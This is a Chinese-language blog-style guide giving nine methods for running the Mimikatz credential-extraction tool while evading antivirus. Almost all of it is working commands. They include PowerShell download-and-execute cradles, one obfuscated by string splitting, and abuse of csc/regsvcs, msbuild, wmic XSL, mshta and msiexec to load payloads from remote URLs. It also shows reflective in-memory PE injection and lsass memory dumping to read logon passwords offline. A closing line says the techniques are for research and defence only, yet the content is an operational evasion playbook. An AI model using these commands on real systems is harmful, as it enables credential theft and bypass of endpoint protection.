九种姿势运行Mimikatz
字数 719 2025-08-18 11:37:23

Mimikatz绕过杀软执行九种姿势详解

前言

Mimikatz是一款功能强大的Windows凭证提取工具,但由于其敏感性,大多数杀毒软件都会对其进行拦截。本文详细介绍了九种绕过杀软(以360为例)执行Mimikatz的方法,仅供技术研究和防御参考。

姿势一:PowerShell加载

基础方法

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"

远程加载

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz

混淆绕过

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

姿势二:.NET 2.0加载

准备工作

  1. 下载katz.cs文件
  2. 放置于C:\Windows\Microsoft.NET\Framework\v2.0.50727

PowerShell生成密钥

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vWx979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

编译执行

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe

姿势三:JS加载

方法

使用DotNetToJScript实现:

  1. 下载mimikatz.js
  2. 执行:
cscript mimikatz.js

绕过方法

参考:AMSI bypass

姿势四:msiexec加载

远程执行

msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart

本地执行

msiexec /passive /i C:\Users\Administrator\Downloads\Mimikatz.msi

姿势五:.NET 4.0加载

方法

  1. 下载mimikatz.xml
  2. 执行:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimikatz.xml

姿势六:JScript的XSL版

方法

  1. 下载mimikatz.xsl
  2. 本地加载:
wmic os get /format:"mimikatz.xsl"
  1. 远程加载:
wmic os get /format:"http://127.0.0.1/mimikatz.xsl"

姿势七:JScript的SCT版

方法

  1. 下载mimikatz.sct
  2. 执行:
mshta.exe javascript:a=GetObject("script:https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct").Exec(); log coffee exit

姿势八:内存中加载

方法

  1. 下载Invoke-ReflectivePEInjection.ps1
  2. 执行:
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.101/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLR

姿势九:导出lsass进程离线读密码

方法一:使用procdump

procdump64.exe -accepteula -ma lsass.exe 1.dmp

方法二:任务管理器转储

  1. 打开任务管理器
  2. 找到lsass.exe进程
  3. 右键"创建转储文件"

离线分析

mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

总结

  1. 导出lsass进程内存方式是较为稳定可靠的方法
  2. PowerShell远程加载脚本方式简单方便
  3. 不同环境可能需要尝试多种方法才能成功绕过防护

注意:本文所述技术仅供安全研究和防御参考,请勿用于非法用途。

Mimikatz绕过杀软执行九种姿势详解 前言 Mimikatz是一款功能强大的Windows凭证提取工具,但由于其敏感性,大多数杀毒软件都会对其进行拦截。本文详细介绍了九种绕过杀软(以360为例)执行Mimikatz的方法,仅供技术研究和防御参考。 姿势一:PowerShell加载 基础方法 远程加载 混淆绕过 姿势二:.NET 2.0加载 准备工作 下载katz.cs文件 放置于 C:\Windows\Microsoft.NET\Framework\v2.0.50727 PowerShell生成密钥 编译执行 姿势三:JS加载 方法 使用DotNetToJScript实现: 下载mimikatz.js 执行: 绕过方法 参考: AMSI bypass 姿势四:msiexec加载 远程执行 本地执行 姿势五:.NET 4.0加载 方法 下载mimikatz.xml 执行: 姿势六:JScript的XSL版 方法 下载mimikatz.xsl 本地加载: 远程加载: 姿势七:JScript的SCT版 方法 下载mimikatz.sct 执行: 姿势八:内存中加载 方法 下载Invoke-ReflectivePEInjection.ps1 执行: 姿势九:导出lsass进程离线读密码 方法一:使用procdump 方法二:任务管理器转储 打开任务管理器 找到lsass.exe进程 右键"创建转储文件" 离线分析 总结 导出lsass进程内存方式是较为稳定可靠的方法 PowerShell远程加载脚本方式简单方便 不同环境可能需要尝试多种方法才能成功绕过防护 注意:本文所述技术仅供安全研究和防御参考,请勿用于非法用途。